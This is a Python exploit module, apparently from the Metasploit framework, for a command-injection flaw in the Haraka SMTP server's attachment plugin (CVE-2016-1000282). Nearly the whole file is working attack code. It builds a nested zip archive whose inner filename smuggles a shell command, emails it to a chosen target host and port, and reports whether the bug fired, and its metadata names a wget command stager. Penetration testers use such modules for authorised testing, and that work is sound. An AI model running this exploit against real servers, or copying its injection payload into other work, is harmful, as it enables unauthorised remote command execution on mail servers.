metasploit-framework/modules/exploits/linux/smtp/haraka.py

115 lines
4.5 KiB
Python
Executable File

#!/usr/bin/env python2.7
# Vendor Homepage: https://haraka.github.io/
# Software Link: https://github.com/haraka/Haraka
# Exploit github: http://github.com/outflankbv/Exploits/
# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
# Version: <= Haraka 2.8.8 (with attachment plugin enabled)
# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
# Tested versions: 2.8.8 and 2.7.2
# Thanks to: Dexlab.nl for asking me to look at Haraka.
import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.utils import COMMASPACE, formatdate
from email.header import Header
from email.utils import formataddr
from email.mime.text import MIMEText
from datetime import datetime
import zipfile
import StringIO
import sys, os, json
metadata = {
'name': 'Haraka SMTP Command Injection',
'description': '''
The Haraka SMTP server comes with a plugin for processing attachments.
Versions before 2.8.9 can be vulnerable to command injection
''',
'authors': ['xychix <xychix[AT]hotmail.com>', 'smfreegard', 'Adam Cammack <adam_cammack[AT]rapid7.com>'],
'date': '2017-01-26',
'references': [
{'type': 'cve', 'ref': '2016-1000282'},
{'type': 'edb', 'ref': '41162'},
{'type': 'url', 'ref': 'https://github.com/haraka/Haraka/pull/1606'},
],
'type': 'remote_exploit.cmd_stager.wget',
'privileged': True,
'targets': [
{'platform': 'linux', 'arch': 'x64'},
{'platform': 'linux', 'arch': 'x86'}
],
'options': {
'email_to': {'type': 'string', 'description': 'Email to send to, must be accepted by the server', 'required': True, 'default': 'admin@localhost'},
'email_from': {'type': 'string', 'description': 'Address to send from', 'required': True, 'default': 'foo@example.com'},
'rhost': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},
'rport': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 25}
}}
def log(message, level='info'):
print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
'level': level,
'message': message
}}))
sys.stdout.flush()
def send_mail(to, mailserver, cmd, mfrom, port):
msg = MIMEMultipart()
html = "harakiri"
msg['Subject'] = "harakiri"
msg['From'] = mfrom
msg['To'] = to
f = "harakiri.zip"
msg.attach(MIMEText(html))
log("Send harariki to %s, commandline: %s , mailserver %s is used for delivery"%(to, cmd, mailserver), 'debug')
part = MIMEApplication(create_zip(cmd),Name="harakiri.zip")
part['Content-Disposition'] = 'attachment; filename="harakiri.zip"'
msg.attach(part)
log("Sending mail to target server...")
log(msg.as_string(), 'debug')
s = smtplib.SMTP(mailserver, port)
try:
resp = s.sendmail(mfrom, to, msg.as_string())
except smtplib.SMTPDataError as err:
if err[0] == 450:
log("Triggered bug in target server (%s)"%err[1], 'good')
return(True)
log("Bug not triggered in target server", 'error')
log("it may not be vulnerable or have the attachment plugin activated", 'error')
s.close()
return(False)
class InMemoryZip(object):
def __init__(self):
self.in_memory_zip = StringIO.StringIO()
def append(self, filename_in_zip, file_contents):
zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False)
zf.writestr(filename_in_zip, file_contents)
for zfile in zf.filelist:
zfile.create_system = 0
return self
def read(self):
self.in_memory_zip.seek(0)
return self.in_memory_zip.read()
def create_zip(cmd="touch /tmp/harakiri"):
z1 = InMemoryZip()
z2 = InMemoryZip()
z2.append("harakiri.txt",
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.")
z1.append("a\";%s;echo \"a.zip"%cmd, z2.read())
return(z1.read())
if __name__ == '__main__':
req = json.loads(os.read(0, 10000))
if req['method'] == 'describe':
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
elif req['method'] == 'run':
args = req['params']
send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport']))
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
'message': 'Exploit completed'
}}))
sys.stdout.flush()